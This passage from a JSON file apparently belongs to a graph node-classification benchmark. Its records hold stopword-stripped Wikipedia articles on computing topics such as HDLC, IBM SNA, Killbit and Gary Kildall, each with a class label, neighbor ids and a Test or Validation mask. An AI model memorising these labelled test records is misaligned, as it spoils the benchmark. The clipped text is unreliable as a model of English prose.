place across entire continent september 1986 issue mike gray lauded game best computer simulation true fantasy role-playing experience ever seen apple ii commodore 64 128 treasure hoard computer frp games complete unless get hands one praised ultima iv incredible find store ’ pass ... ’ discouraged takes find copy — search easy one compared awaits start quest avatar famitsu reviewed nes/famicom version scored 31 40 ultima iv top game billboard list software best sellers february march 1986 co-creator dave arneson 1988 wrote ultima iv games stood pretty much alone quirks instead trend setters crpg industry games follow innovations score 7.80 10 1988 ultima iv among first members computer gaming world hall fame games rated highly time readers 1990 game received third-highest number votes survey readers all-time favorites 1996 magazine ranked second-best video game time second most-innovative computer game 2013 ign placed ultima iv 26 list top 100 rpgs time 2015 peter tieryas tor.com stated nes version represented different type ideal ... make narrative determine course journey engendering sense immersion effect making feel like control previous rpg",
    "neighbors": [
      5260,
      6797,
      9006,
      4527,
      4530,
      11443,
      4533,
      11221,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4537,
    "label": 3,
    "text": "Socket_2:socket 2 socket 2 one series cpu sockets various x86 microprocessors inserted updated socket 1 added support pentium overdrive processors socket 2 238-pin low insertion force lif zero insertion force zif 19×19 pin grid array pga socket suitable 5-volt 25 66 mhz 486 sx 486 dx 486 dx2 486 overdrive 63 83 mhz pentium overdrive processors",
    "neighbors": [
      5901,
      8851,
      4246,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      2874,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      499,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 4538,
    "label": 7,
    "text": "Apache_Hama:apache hama apache hama distributed computing framework based bulk synchronous parallel computing techniques massive scientific computations e.g. matrix graph network algorithms top level project apache software foundation created edward j. yoon named short hadoop matrix inspired google pregel large-scale graph computing framework described 2010 hama also means hippopotamus korean language 하마 following trend naming apache projects animals zoology apache pig hama consists three major components bspmaster groomservers zookeeper bspmaster responsible bsp master multiple grooms started script bsp master starts rpc server groom servers groom servers starts bsppeer instance rpc proxy contact bsp master started groom periodically sends heartbeat message encloses groom server status including maximum task capacity unused memory time bsp master receives heartbeat message brings up-to-date groom server status bsp master makes use groom servers status order effectively assign tasks idle groom servers returns heartbeat response contains assigned tasks others actions groom server fifo job scheduler simple task assignment algorithms groom server shortly referred groom process performs bsp tasks assigned bspmaster groom contacts bspmaster takes assigned tasks reports status means periodical piggybacks bspmaster groom designed run hdfs distributed storages basically groom server data node run one physical node zookeeper used manage efficient barrier synchronisation bsppeers",
    "neighbors": [
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      3877,
      10661,
      11303,
      5677,
      1327,
      7983,
      4919,
      5047,
      6074,
      1851,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      2163,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4539,
    "label": 1,
    "text": "National_Information_Governance_Board_for_Health_and_Social_Care:national information governance board health social care national information governance board health social care nigb established united kingdom section 157 health social care act 2008 effect october 2008 range advisory functions relating information governance january 2009 nigb also gained functions section 251 nhs act 2006 previously held patient information advisory group piag abolition functions advise secretary state health use powers set aside common law duty confidentiality england identifiable patient information needed consent practicable 1 april 2013 nigb functions monitoring improving information governance practice transferred care quality commission established national information governance committee oversee work functions relating section 251 nhs act 2006 access people personal confidential information research purposes transferred health research authority confidentiality advisory group key functions nigb excerpted legislation definition “ relevant information ” legislation covers patient information information obtained generated course provision health service information obtained generated course exercise local social services authority england adult social services functions areas nigb functions e delegated nigb ethics confidentiality committee ecc functions primarily related applications use identifiable patient information without consent specific circumstances within bounds section 251 nhs act 2006 applications considered piag nigb passed health research authority confidentiality advisory group cag 1 april 2013 nigb also replaced care record development board crdb closed september 2007 nigb subsequently maintained nhs care record guarantee originally developed crdb developed companion social care record guarantee nigb consisted chair number public members appointed nhs appointments commission number representative members appointed secretary state health range stakeholder organisations representatives several stakeholder organisations served corresponding advisers nigb typically attended meetings regular observers meetings included representatives information commissioner office devolved uk administrations ecc consisted chair number members appointed nigb advice nhs appointments commission approved independent assessor ecc chair two ecc members also nigb members 1 june 2011 31 march 2013 dame fiona caldicott chair nigb succeeding harry cayton chaired nigb since inception members nigb ecc widely distributed nationally attended meetings nigb office since september 2011 based skipton house london se1 nigb staff team predominantly based office result health social care act 2012 nigb abolished effect 1 april 2013 functions delegated ecc respect research transferred health research authority nhs commissioning board responsible providing advice guidance nhs bodies functions transferred national information governance committee hosted care quality commission",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4540,
    "label": 3,
    "text": "Front_Line_(video_game):front line video game game created tetsuya sasaki influenced space invaders galaga 1985 ikari warriors follows conventions established front line including vertically scrolling levels entering/exiting tanks dying occupied tank destroyed playing lone soldier player ultimate objective lob hand grenade enemy fort first fighting infantry units battling tanks finally reaching opponent compound player begins two weapons pistol grenades ammo limit player advanced far enough enemy territory tank warfare stage player hijack tank fight enemy tanks two types tanks available light tank armed machine gun heavy tank armed cannon light tank nimble easily destroyed enemy heavy tank slower sustain one hit light tank second hit light tank destroy single shot heavy tank destroy either type tank partially damaged tank evacuated player jump back resume normal operation however either type tank player must exit vehicle within seconds struck fatal shot player exit tank explodes loses life extra life awarded 10,000 15,000 none thereafter tank battle continues player reaches enemy fort fort brick-barricaded tank fires mortar rounds player attempts take order destroy tank player must toss grenade brick barricade accomplished foot done tank explode enemy soldier wave white flag signalling surrender plus 1,000 bonus points game repeats infantry level enemy soldiers become increasingly quicker deadlier successive rounds points multiplied based level played following release coin-op arcade platform game ported colecovision console pc-8801 sharp x1 computers 1983 atari 2600 msx 1982 fm-7 nintendo famicom 1985. famicom version taito first game console 1983 arcade awards front line runner-up coin-op game year behind pole position award given electronic games stated arcade approach dirty business infantry combat forces player keep moving firing constantly action non-stop attractive shoot 'em game boy color spin-off entitled sgt rock frontline published taito 2000 game follows template original arcade game set within dc comics universe arcade original included taito memories gekan playstation 2 console 2005 taito legends 2 playstation 2 xbox windows platforms 2006 famicom version released virtual console service japan june 5 2007 wii january 15 2014 nintendo 3ds",
    "neighbors": [
      11522,
      3075,
      11238,
      10316,
      6797,
      9006,
      3256
    ],
    "mask": "Test"
  },
  {
    "node_id": 4541,
    "label": 4,
    "text": "Handwritten_biometric_recognition:handwritten biometric recognition handwritten biometric recognition process identifying author given text handwritten biometric recognition belongs behavioural biometric systems based something user learned handwritten biometrics split two main categories static mode users writes paper digitize optical scanner camera biometric system recognizes text analyzing shape group also known off-line dynamic mode users writes digitizing tablet acquires text real time another possibility acquisition means stylus-operated pdas dynamic recognition also known on-line .dynamic information usually consists following information better accuracies achieved means dynamic systems technological approaches exist handwritten biometric recognition confused optical character recognition ocr goal handwritten biometrics identify author given text goal ocr recognize content text regardless author",
    "neighbors": [
      5857,
      10207
    ],
    "mask": "None"
  },
  {
    "node_id": 4542,
    "label": 2,
    "text": "Killbit:killbit killbit security feature web browsers based microsoft trident engine internet explorer activex containers respect killbit microsoft office killbit instructs activex control container never use specific piece activex software whether third-party microsoft identified class identifier clsid main purpose killbit close security holes vendor discovers security hole specific version activex control request microsoft put killbit killbit updates typically deployed microsoft windows operating systems via windows update flag windows registry identifies clsid unsafe clsid type guid acts serial number software question must exist piece software behaves activex control activex container finds clsid killbit entry matches clsid software software blocked running activex container vendor wants release updated version release different clsid internet explorer html application host also respects killbit processing object tag html processing scripts html",
    "neighbors": [
      10026,
      11683,
      6797,
      6679
    ],
    "mask": "None"
  },
  {
    "node_id": 4543,
    "label": 5,
    "text": "High-Level_Data_Link_Control:high-level data link control high-level data link control hdlc bit-oriented code-transparent synchronous data link layer protocol developed international organization standardization iso standard hdlc iso/iec 13239:2002 hdlc provides connection-oriented connectionless service hdlc used point-to-multipoint connections via original master-slave modes normal response mode nrm asynchronous response mode arm rarely used used almost exclusively connect one device another using asynchronous balanced mode abm hdlc based ibm sdlc protocol layer 2 protocol ibm systems network architecture sna extended standardized itu lap link access procedure ansi named essentially identical version adccp hdlc specification specify full semantics frame fields allows fully compliant standards derived derivatives since appeared innumerable standards adopted x.25 protocol stack lapb v.42 protocol lapm frame relay protocol stack lapf isdn protocol stack lapd original iso standards hdlc following iso/iec 13239:2002 current standard replaced specifications hdlc inspiration ieee 802.2 llc protocol basis framing mechanism used ppp synchronous lines used many servers connect wan commonly internet similar version used control channel e-carrier e1 sonet multichannel telephone lines cisco hdlc uses low-level hdlc framing techniques adds protocol field standard hdlc header hdlc frames transmitted synchronous asynchronous serial communication links links mechanism mark beginning end frame beginning end frame identified done using unique sequence bits frame delimiter flag encoding data ensure flag sequence never seen inside frame frame begins ends frame delimiter frame delimiter end frame may also mark start next frame synchronous asynchronous links flag sequence binary 01111110 hexadecimal 0x7e details quite different flag sequence consists six consecutive 1-bits data coded ensure never contains five 1-bits row done bit stuffing time five consecutive 1-bits appear transmitted data data paused 0-bit transmitted receiving device knows done seeing five 1-bits row following 0-bit stripped received data instead sixth bit 1 either flag seventh bit 0 error seventh bit 1 latter case frame receive procedure aborted restarted flag next seen bit-stuffing serves second purpose ensuring sufficient number signal transitions synchronous links data nrzi encoded 0-bit transmitted change signal line 1-bit sent change thus 0 bit provides opportunity receiving modem synchronize clock via phase-locked loop many 1-bits row receiver lose count bit-stuffing provides minimum one transition per six bit times transmission data one transition per seven bit times transmission flag frames transmitted simplex full-duplex synchronous link frame delimiter continuously transmitted link generates one two continuous waveforms depending initial state hdlc specification allows 0-bit end frame delimiter shared start next frame delimiter i.e 011111101111110 hardware support half-duplex multi-drop communication several transmitters share line receiver line see continuous idling 1-bits inter-frame period transmitter active hdlc transmits bytes data least significant bit first confused little-endian order refers byte ordering within multi-byte field using asynchronous serial communication standard rs-232 serial ports synchronous-style bit stuffing inappropriate several reasons instead asynchronous framing uses control-octet transparency also called byte stuffing octet stuffing frame boundary octet 01111110 0x7e hexadecimal notation control escape octet value 0x7d bit sequence '10111110 rs-232 transmits least-significant bit first either two octets appears transmitted data escape octet sent followed original data octet bit 5 inverted example byte 0x7e would transmitted 0x7d 0x5e 10111110 01111010 reserved octet values xon xoff escaped way necessary abort sequence 0x7d 0x7e ends packet incomplete byte-stuff sequence forcing receiver detect error used abort packet transmission chance partial packet interpreted valid receiver contents hdlc frame shown following table note end flag one frame may beginning start flag next frame data usually sent multiples 8 bits variants require others theoretically permit data alignments 8-bit boundaries frame check sequence fcs 16-bit crc-ccitt 32-bit crc-32 computed address control information fields provides means receiver detect errors may induced transmission frame lost bits flipped bits extraneous bits however given algorithms used calculate fcs probability certain types transmission errors going undetected increases length data checked errors fcs implicitly limit practical size frame receiver calculation fcs match sender indicating frame contains errors receiver either send negative acknowledge packet sender send nothing either receiving negative acknowledge packet timing waiting positive acknowledge packet sender retransmit failed frame fcs implemented many early communication links relatively high bit error rate fcs could readily computed simple fast circuitry software effective forward error correction schemes widely used protocols synchronous data link control sdlc originally designed connect one computer multiple peripherals via mutidrop bus original normal response mode master-slave mode computer primary terminal gives peripheral secondary terminal permission speak turn communication either primary terminal frames include one address secondary terminal primary terminal assigned address distinction commands sent primary secondary responses sent secondary primary reflected encoding commands responses indistinguishable except difference direction transmitted normal response mode allows secondary-to-primary link shared without contention primary give secondaries permission transmit one time also allows operation half-duplex communication links long primary aware may transmit given permission secondary asynchronous response mode hdlc addition use full-duplex links retaining primary/secondary distinction allows secondary transmit time thus must mechanism ensure multiple secondaries try transmit time one secondary asynchronous balanced mode adds concept combined terminal act primary secondary unfortunately mode operation implementation subtleties common frames sent care whether command response frame essential ones notably unnumbered frames frame p/f bit set address field received frame must examined determine whether contains command address received response address received terminal means address field optional even point-to-point links needed disambiguate peer talked hdlc variants extend address field include source destination addresses explicit command/response bit three fundamental types hdlc frames may distinguished general format control field also extended 2-byte forms frames least significant bit rightmost table sent first poll/final single bit two names called poll part command set primary station obtain response secondary station final part response set secondary station indicate response end transmission cases bit clear bit used token passed back forth stations one token exist time secondary sends final received poll primary primary sends poll received final back secondary timeout indicating bit lost operating combined station important maintain distinction p f bits may two checkpoint cycles operating simultaneously p bit arriving command remote station response p bit f bit arriving response frames contain receive sequence number n r n r provides positive acknowledgement receipt i-frames side link value always first frame yet received acknowledges frames n values n r −1 modulo 8 modulo 128 received indicates n next frame expects receive n r operates way whether part command response combined station one sequence number space incremented successive i-frames modulo 8 modulo 128 depending number bits sequence number 7 127 i-frames may awaiting acknowledgment time information frames i-frames transport user data network layer addition also include flow error control information piggybacked data sub-fields control field define functions least significant bit first transmitted defines frame type 0 means i-frame except interpretation p/f field difference command frame response frame p/f 0 two forms exactly equivalent supervisory frames 's-frames used flow error control whenever piggybacking impossible inappropriate station data send s-frames hdlc information fields although hdlc-derived protocols use information fields multi-selective reject s-frame control field includes leading 10 indicating s-frame followed 2-bit type poll/final bit 3-bit sequence number 4-bit padding field followed 7-bit sequence number first least significant 2 bits mean s-frame frames include p/f bit receive sequence number described except interpretation p/f field difference command frame response frame p/f 0 two forms exactly equivalent unnumbered frames u-frames used link management also used transfer user data exchange session management control information connected devices u-frames contain information field used system management information user data first 2 bits 11 mean u-frame 5 type bits 2 p/f bit 3 bit p/f bit create 32 different types u-frame link configurations categorized either three link configurations additional link configuration disconnected mode mode secondary station initialized primary explicitly disconnected mode secondary responds almost every frame mode set command disconnected mode response purpose mode allow primary reliably detect secondary powered otherwise reset minimal set required operation hdlc module end transmits ua frame request accepted request rejected sends dm disconnect mode frame unnumbered frames identified low two bits 1 p/f flag leaves 5 bits frame type even though fewer 32 values use types different meanings depending direction sent command response relationship disc disconnect command rd request disconnect response seems clear enough reason making sarm command numerically equal dm response obscure ui uih xid test frames contain payload used commands responses sm command frmr response also contain payload",
    "neighbors": [
      2306,
      9860,
      3847,
      6544,
      1297,
      10647,
      5531,
      5021,
      2206,
      7071,
      8989,
      7478,
      7865,
      2746,
      5439,
      7360,
      4546,
      11332,
      1478,
      1997,
      5581,
      10833,
      1246,
      2912,
      1121,
      4963,
      1893,
      8432,
      5875,
      8692,
      3323,
      5118,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 4544,
    "label": 2,
    "text": "Foundation_Kit:foundation kit foundation kit foundation short objective-c framework openstep specification provides basic classes wrapper classes data structure classes framework uses prefix ns nextstep next/sun_microsystems class common base class objective-c hierarchies provides standard methods working objects managing memory associated querying class used string manipulation representing unicode string typically using utf-16 internal format nsstring immutable thus initialized modified nsmutablestring modifiable version nsvalue wrapper class c data types nsnumber wrapper class c number data types int double float data structures foundation kit hold objects primitive types wrappers nsvalue nsnumber used data structures dynamic array objects supporting constant-time indexing nsarray immutable version initialized objects modified nsmutablearray may modified adding removing objects associative data container key-value pairs unique keys searching element addition removal case nsmutabledictionary faster-than-linear however order elements within container guaranteed associative container unique keys similar nsdictionary difference members contain data object wrapper raw byte data object type dynamically allocate manage data refer data owned managed something else static numeric array classes store times dates represent calendrical information offer methods calculating date time differences together nslocale provide methods displaying dates times many formats adjusting times dates based location world foundation kit part cocoa api beginning successor openstep/mach framework deviated openstep compliance places incompatible foundation kit cocoa touch api framework based macos foundation openstep foundation kit implemented gnustep base package implementation mostly comparable 4 classes missing aims comparable openstep api later macos additions foundation kit implemented cocotron open-source implementation cocoa purefoundation open-source implementation foundation implements foundation wrapping core foundation like cocoa rather create separate foundation scratch like gnustep cocotron swiftfoundation apple open-source swift implementation foundation api platforms objective-c runtime",
    "neighbors": [
      9665,
      10470,
      7806,
      7307,
      10765,
      3790,
      8303,
      8304,
      2673,
      7292,
      2045,
      3038
    ],
    "mask": "None"
  },
  {
    "node_id": 4545,
    "label": 1,
    "text": "Art_Recovery_Group:art recovery group art recovery international previously art recovery group private company provides due diligence dispute resolution art recovery services international art market cultural heritage institutions headquartered venice italy company founded 2013 initially specialising recovery stolen claimed works art 2015 company launched artclaim database new art market due diligence resource online-resource developed soza technical ltu technologies introducing image-recognition technology commercial due diligence first time 2016 non-profit company based us formed artclaim database became artive.org art recovery international established 2013 christopher a. marinello lawyer specialising recovery stolen claimed works art prior founding company marinello formerly general counsel art loss register marinello responsible virtually successful art recoveries art loss register 2006-2013 2013 marinello became dissatisfied methods alr chairman julian radcliffe decided form art recovery business stolen art database cases clients followed art recovery international enjoyed almost immediate success acclaim company services provided law enforcement agencies pro-bono basis since establishment art recovery overseen number high-profile recovery cases including works 2015 company launched artclaim database new due diligence resource international art market web-based platform introduced image-recognition technology searches item registrations order improve accuracy efforts reduce trade illicit art october 2015 artclaim database awarded wealth management innovator year spear wealth management awards 2016 non-profit company based us formed artclaim database became artive.org art recovery group ceo christopher a. marinello one world leading practitioners restitution recovery stolen claimed works art involved recovery 500 million worth art high-profile stolen art cases around world marinello also represented heirs paul rosenberg recovery efforts art works looted second world war may 2015 marinello oversaw recovery painting henri matisse discovered munich home cornelius gurlitt behalf rosenberg family 2013 marinello co-founded annual art crime cultural heritage symposium new york university school professional studies",
    "neighbors": [
      10549
    ],
    "mask": "Test"
  },
  {
    "node_id": 4546,
    "label": 2,
    "text": "IBM_Systems_Network_Architecture:ibm systems network architecture systems network architecture sna ibm proprietary networking architecture created 1974 complete protocol stack interconnecting computers resources sna describes formats protocols piece software implementation sna takes form various communications packages notably virtual telecommunications access method vtam mainframe software package sna communications sna made public part ibm advanced function communications announcement september 1974 included implementation sna/sdlc synchronous data link control protocols new communications products supported ibm 3704/3705 communication controllers network control program ncp system/370 vtam software cics ims announcement followed another announcement july 1975 introduced ibm 3760 data entry station ibm 3790 communication system new models ibm 3270 display system sna mainly designed ibm systems development division laboratory research triangle park north carolina usa helped laboratories implemented sna/sdlc details later made public ibm system reference library manuals ibm systems journal sna still used extensively banks financial transaction networks well many government agencies ibm still providing support sna one primary pieces hardware 3745/3746 communications controller withdrawn market ibm estimated 20,000 controllers installed however ibm continues provide hardware maintenance service microcode features support users robust market smaller companies continues provide 3745/3746 features parts service vtam also supported ibm ibm network control program ncp required 3745/3746 controllers 2008 ibm publication said ibm mid-1970s saw mainly hardware vendor hence innovations period aimed increase hardware sales sna objective reduce costs operating large numbers terminals thus induce customers develop expand interactive terminal-based systems opposed batch systems expansion interactive terminal-based systems would increase sales terminals importantly mainframe computers peripherals partly simple increase volume work done systems partly interactive processing requires computing power per transaction batch processing hence sna aimed reduce main non-computer costs difficulties operating large networks using earlier communications protocols difficulties included result running large number terminals required lot communications lines number required today especially different types terminals needed supported users wanted use different types applications .e.g cics tso location purely financial terms sna objectives increase customers spending terminal-based systems time increase ibm share spending mainly expense telecommunications companies sna also aimed overcome limitation architecture ibm system/370 mainframes inherited system/360 cpu could connect 16 i/o channels channel could handle 256 peripherals i.e maximum 4096 peripherals per cpu time sna designed communications line counted peripheral thus number terminals powerful mainframes could otherwise communicate limited improvements computer component technology made feasible build terminals included powerful communications cards could operate single standard communications protocol rather stripped-down protocol suited specific type terminal result several multi-layer communications protocols proposed 1970s ibm sna itu-t x.25 became dominant later important elements sna include sna removed link control application program placed ncp following advantages disadvantages sna core designed ability wrap different layers connections blanket security communicate within sna environment would first connect node establish maintain link connection network negotiate proper session handle flows within session level different security controls govern connections protect session information network addressable units sna network components assigned address send receive information distinguished follows sna essentially offers transparent communication equipment specifics impose constraints onto lu-lu communication eventually serves purpose make distinction lu types application must take functionality terminal equipment account e.g screen sizes layout within sna three types data stream connect local display terminals printers sna character string scs used lu1 terminals logging sna network unformatted system services uss 3270 data stream mainly used mainframes system/370 successors including zseries family 5250 data stream mainly used minicomputers/servers system/34 system/36 system/38 as/400 successors including system ibm power systems running ibm i. sna defines several kinds devices called logical unit types primary ones use lu1 lu2 lu6.2 advanced protocol application application conversations term 37xx refers ibm family sna communications controllers 3745 supports eight high-speed t1 circuits 3725 large-scale node front-end processor host 3720 remote node functions concentrator router vtam/ncp pu4 nodes attached ibm token ring networks share local area network infrastructure workstations servers ncp encapsulates sna packets token-ring frames allowing sessions flow token-ring network actual encapsulation decapsulation takes place 3745 mainframe-based entities looked alternatives 37xx-based networks ibm partnered cisco mid-1990s together developed data link switching dlsw dlsw encapsulates sna packets ip datagrams allowing sessions flow ip network actual encapsulation decapsulation takes place cisco routers end dlsw peer connection local mainframe site router uses token ring topology connect natively vtam remote user end connection pu type 2 emulator sna gateway server connects peer router via router lan interface end user terminals typically pcs 3270 emulation software defined sna gateway vtam/ncp pu type 2 definition becomes switched major node local vtam without ncp line connection defined using various possible solutions token ring interface 3745 3172 lan channel station cisco escon-compatible channel interface processor",
    "neighbors": [
      8192,
      4490,
      2827,
      909,
      7053,
      6544,
      11024,
      7188,
      10104,
      5531,
      10280,
      45,
      7983,
      9007,
      5562,
      4667,
      3774,
      5439,
      2112,
      4543,
      4546,
      7360,
      8640,
      10438,
      8138,
      11596,
      6993,
      10065,
      2901,
      10072,
      1760,
      5472,
      5603,
      868,
      4586,
      4589,
      10094,
      2168,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 4547,
    "label": 5,
    "text": "LISTSERV:listserv term listserv written registered trademark licensee l-soft international inc. listserv used refer electronic mailing list software applications general properly applied early instances software allows sender send one email list transparently sends addresses subscribers list original listserv software bitnic listserv also known bitnic listserv 1984–1986 allowed mailing lists implemented ibm vm mainframes developed ira fuchs daniel oberst ricky hernandez 1984 mailing list service known listserv bitnic also known listserv bitnic quickly became key service bitnet network provided functionality similar unix sendmail alias sendmail subscriptions managed manually 1986 éric thomas developed independent application originally named revised listserv also known revised listserv first automated mailing list management application prior revised listserv email lists managed manually join leave list people would write human list administrator ask added removed process got time-consuming discussion lists grew popularity 1987 users bitnic listserv migrated thomas version listserv freeware 1986 1993 commercial product developed l-soft company founded listserv author éric thomas 1994 free version limited ten lists 500 subscribers downloaded company web site several list management tools subsequently developed lyris listmanager 1997 sympa 1997 gnu mailman 1998 1986 éric thomas developed concept automated mailing list manager whilst student ecole centrale paris developed software known listserv early software features allowed joining leaving list without need human administration also list owner could add remove subscribers edit templates welcome system messages amongst innovations listserv introduced double opt-in 1993 first spam filter 1995 release thomas listserv 1986 listserv bitnic enhanced provide automatic list management abandoned months later bitnic installed thomas listserv name bitnic thomas products unrelated neither product based product code though electronic mailing lists also known email lists popular continue used today due ease use listserv registered trademark u.s. patent trademark office 1995 based use since 1986 registered swedish patent registration office prv 2001 jurisdictions using word listserv describe different product generic term email-based mailing list kind trademark misuse standard generic terms electronic mailing list elist email list list email list manager email list software software product manages list nevertheless generic use term common times version 15.0 individual user passwords stored clear available users listed site managers postmasters application configuration thus allowing unethical managers attackers compromise site easily try reuse username password sites passwords hashed protect since version 15.5 released 2007 listserv available several licensing options listserv lite free edition non-commercial hobby use listserv lite smaller workloads listserv standard full-featured version listserv hpo high performance option listserv maestro customized targeted email publishing reporting list currently-supported operating systems found http //lsoft.com/products/listserv_os.asp",
    "neighbors": [
      4272,
      6762,
      3323,
      5612
    ],
    "mask": "None"
  },
  {
    "node_id": 4548,
    "label": 2,
    "text": "Gary_Kildall:gary kildall gary arlen kildall may 19 1942 – july 11 1994 american computer scientist microcomputer entrepreneur created cp/m operating system founded digital research inc. dri kildall one first people see microprocessors fully capable computers rather equipment controllers organize company around concept also co-hosted pbs tv show computer chronicles although career computing spanned two decades mainly remembered connection ibm unsuccessful attempt 1980 license cp/m ibm personal computer gary kildall born grew seattle washington family operated seamanship school father joseph kildall captain norwegian heritage mother emma half-swedish gary grandmother born långbäck sweden skellefteå municipality emigrated canada 23 years age gary attended university washington uw hoping become mathematics teacher became increasingly interested computer technology receiving degree fulfilled draft obligation united states navy teaching naval postgraduate school nps monterey california within hour drive silicon valley kildall heard first commercially available microprocessor intel 4004 bought one processors began writing experimental programs learn processors worked intel consultant days kildall briefly returned uw finished doctorate computer science 1972 resumed teaching nps published paper introduced theory data-flow analysis used today optimizing compilers continued experiment microcomputers emerging technology floppy disks intel lent systems using 8008 8080 processors 1973 developed first high-level programming language microprocessors called pl/m created cp/m year enable 8080 control floppy drive combining first time essential components computer microcomputer scale demonstrated cp/m intel intel little interest chose market pl/m instead kildall wife dorothy established company originally called intergalactic digital research later renamed digital research inc market cp/m advertisements hobbyist magazines digital research licensed cp/m imsai 8080 popular clone altair 8800 manufacturers licensed cp/m became de facto standard support increasing number hardware variations response kildall pioneered concept bios set simple programs stored computer hardware rom eprom chip enabled cp/m run different systems without modification cp/m quick success took kildall surprise slow update high density floppy disks hard disk drives hardware manufacturers talked creating rival operating system kildall started rush project develop cp/m 2 1981 peak popularity cp/m ran 3,000 different computer models dri 5.4 million yearly revenues ibm presided john r. opel approached digital research 1980 bill gates suggestion negotiate purchase forthcoming version cp/m called cp/m-86 ibm pc gary left negotiations wife dorothy usually colleague developer mp/m operating system tom rolander used gary private airplane deliver software manufacturer bill godbout ibm representatives would explain purpose visit insisted dorothy sign non-disclosure agreement advice dri attorney gerry davis dorothy refused sign agreement without gary approval gary returned afternoon tried move discussion ibm forward accounts disagree whether signed non-disclosure agreement well ever met ibm representatives various reasons given two companies failing reach agreement dri products might unwilling sell main product ibm one-time payment rather usual royalty-based plan dorothy might believed company could deliver cp/m-86 ibm proposed schedule company busy developing implementation pl/i programming language data general also possible ibm representatives might annoyed dri spent hours considered routine formality according kildall ibm representatives took flight florida night dorothy took vacation negotiated flight reaching handshake agreement ibm lead negotiator jack sams insisted never met gary one ibm colleague confirmed sams said time accepted someone else group might flight noted flew back seattle talk microsoft sams related story gates already agreed provide basic interpreter several programs pc gates impression story gary capriciously went flying would later tell reporters sams left gates task finding usable operating system weeks later proposed using operating system 86-dos—an independently developed operating system implemented kildall cp/m api—from seattle computer products scp paul allen negotiated licensing deal scp allen 86-dos adapted ibm hardware ibm shipped ibm pc dos kildall obtained copy pc dos examined concluded infringed cp/m asked gerry davis legal options available davis told intellectual property law software clear enough sue instead kildall threatened ibm legal action ibm responded proposal offer cp/m-86 option pc return release liability kildall accepted believing ibm new system like previous personal computers would significant commercial success ibm pc introduced ibm sold operating system unbundled option one operating system options pc dos priced us 40 pc dos seen practically necessary option software titles required without ibm pc limited built-in cassette basic cp/m-86 shipped months later six times expensive 240 sold poorly dos enjoyed far less software support loss ibm deal gary dorothy found pressure bring experienced management gary influence company waned worked various experimental research projects version cp/m multitasking mp/m implementation logo programming language hoped logo educational dialect lisp would supplant basic education seeing demonstration apple lisa kildall oversaw creation dri graphical user interface called gem novell acquired dri 1991 deal netted millions kildall kildall also pursued computing-related projects outside dri seven years 1983 1990 co-hosted public television program side called computer chronicles followed trends personal computing 1984 started another company activenture adapted optical disc technology computer use early 1985 renamed knowledgeset released first computer encyclopedia june 1985 cd-rom version grolier academic american encyclopedia named electronic encyclopedia later acquired banta corporation kildall final business venture known prometheus light sound pls based austin texas developed home pbx system integrated land-line telephones mobile phones kildall colleagues recall creative easygoing adventurous addition flying loved sports cars auto racing boating lifelong love sea although kildall preferred leave ibm affair past known work afterward continually faced comparisons bill gates well fading memories contributions legend grew around fateful ibm-dri meeting encouraged gates various journalists suggesting kildall irresponsibly taken day recreational flight became tired constantly refute story later years occasional private expressions bitterness overshadowed microsoft kildall annoyed university washington asked distinguished graduate attend computer science program anniversary 1992 gave keynote speech gates dropout harvard response started writing memoir computer connections memoir distributed friends expressed frustration people seem value elegance software said gates divisive manipulative user taken much industry appendix called dos plain simple theft first 26 system calls worked cp/m accused ibm contriving price difference pc dos cp/m-86 order marginalize cp/m journalist harold evans used memoir source chapter kildall 2004 book made america concluding microsoft robbed kildall inventions ibm veterans pc project disputed book description events microsoft described one-sided inaccurate august 2016 kildall family made first part memoir available public selling dri novell made kildall wealthy man moved west lake hills suburb austin austin house lakeside property stalls several sports cars plus video studio basement kildall owned flew learjet least one boat lake austin also participated volunteer efforts assist children hiv/aids owned mansion panoramic ocean view pebble beach california near headquarters dri july 8 1994 kildall fell monterey california biker bar hit head exact circumstances injury remain unclear alcoholic later years various sources claimed fell chair fell steps assaulted walked franklin street bar grill wearing harley-davidson leathers checked hospital twice died three days later community hospital monterey peninsula autopsy next day conclusively determine cause death cp/m usenet faq says concussed fall died heart attack connection two unclear buried evergreen washelli memorial park north seattle following announcement kildall death bill gates commented one original pioneers pc revolution creative computer scientist excellent work although competitors always tremendous respect contributions pc industry untimely death unfortunate work missed march 1995 kildall posthumously honored software publishers association software information industry association contributions microcomputer industry april 2014 city pacific grove installed commemorative plaque outside kildall former residence also served early headquarters digital research",
    "neighbors": [
      10113,
      1922,
      6148,
      2055,
      8712,
      6921,
      8075,
      8831,
      3216,
      4114,
      2840,
      2201,
      7068,
      1952,
      2345,
      2729,
      7849,
      11562,
      5293,
      7983,
      5425,
      178,
      7217,
      8115,
      9907,
      8502,
      4409,
      2620,
      7999,
      6594,
      8262,
      10067,
      2135,
      6242,
      10083,
      5220,
      6502,
      1515,
      8301,
      2672,
      3056,
      4337,
      9329,
      9330,
      10102,
      4727,
      11513,
      6778,
      3323,
      3197,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 4549,
    "label": 4,
